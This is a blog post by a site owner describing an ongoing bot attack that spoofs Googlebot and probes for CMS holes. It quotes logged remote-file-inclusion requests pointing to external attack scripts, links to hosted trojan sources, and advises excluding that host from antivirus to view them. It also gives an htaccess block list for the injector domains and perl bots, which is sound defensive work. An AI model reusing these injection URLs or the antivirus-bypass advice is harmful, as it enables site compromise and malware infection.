For this past three days this blog is suffering DOS attack . The attack is still alive now I don’t think they will leave yet.

I cant banned this bot directly as they were sending forge packet (packet spoofing) as googlebot http://www.whois-search.com/whois/64.233.166.136. Im still looking for the right ISP.

OrgName: Google Inc.
OrgID: GOGL
Address: 1600 Amphitheatre Parkway
City: Mountain View
StateProv: CA
PostalCode: 94043
Country: US

At the time being I blocked all remote streams from their random host *.com and “perl bot signature” but blocking will not stop them from hammering this site. I’ll be sending 503 (Service Unavailable) on certain request so if you are having problem accessing this site please check back later.

Type of injections

There is lot uri parameter in my logs (I will disabled server logs - limit resources) they probably has a large inventories check-lists of known CMS vulnerabilities. I can only confirm that its a blackhat seo spams bot as they request uri include the typical order.php page.

/es/wordpress/how-to-removed-wordpress-net-in-spam-injection-infected-by-mike-ja
 gger-goro-class-mailphp/order.php/?wp=http://hom3.t35.com/xpl/hack/id.txt?
/es/wordpress/order.php/?wp=http://hom3.t35.com/xpl/hack/id.txt?
/order.php?wp=http://hom3.t35.com/xpl/hack/id.txt?

To view the following source you need to exclude the website host from your anti-virus program.

• Perl/ShellBot.B trojan - http://hom3.t35.com/xpl/fidz/hack/bnc.txt
• PHP/Rst.S Trojan - http://hom3.t35.com/xpl/fidz

htaccess blocked bad Code Injector and Perl Bot (Botnet)

If you has similar problems. you should block the following domain in your htaccess.
mod_setenvif

SetEnvIfNoCase Referer "^http://(www.)?t35\.com" codeinjector_ref=1
SetEnvIfNoCase Referer "^http://(www.)?jorgevolio\.com" codeinjector_ref=1
SetEnvIfNoCase Referer "^http://(www.)?emabe\.com" codeinjector_ref=1
SetEnvIfNoCase Referer "^http://(www.)?pawang\.in" codeinjector_ref=1
SetEnvIfNoCase Referer "^http://(www.)?gw-gold\.net" codeinjector_ref=1
SetEnvIfNoCase User-Agent "^libwww-perl*" shell_bots=1
SetEnvIfNoCase User-Agent "^Amidalla*" shell_bots=1

<FilesMatch "(.*)">
Order Allow,Deny
Allow from all
Deny from env=codeinjector_ref
Deny from env=shell_bots
</FilesMatch>

if u arent sure if you server support mod_setenvif wrap it like the below example.

<IfModule mod_setenvif.c>
#...replace this line with the above code...
</IfModule>

How to trap Perl Shell Bot

We need a pattern to trap this bots. certainly we knew that these bots :

• doesn’t honor robot.txt
• they crawl all subdirectory
• they has a pattern URI request

For now I only create subdirectory for auto-ban (and some other stuff) based on their pattern. alexa bot will be banned too as they dont honor robot.txt.

I’ll be updating this post from time to time. Do check the related articles on how to packet spoofing and validating forge/spoof packet.

Recent Scan & Update

The below list is automatically added.

December 24, 2007

ip: 64.26.63.10 param: login=,? inject: http://pawang.in/r57.txt

December 24, 2007

ip: 64.26.63.10 param: dir=,login= inject: http://pawang.in/r57.txt????

December 25, 2007

ip: 59.158.128.138 param: p=,:allinurl= inject: http://gw-gold.net/jpg/pictures/test.txt

External Resources

• Packet spoofing - http://www.wireshark.org
• pcapdiff validate forged packet http://www.eff.org/testyourisp/pcapdiff/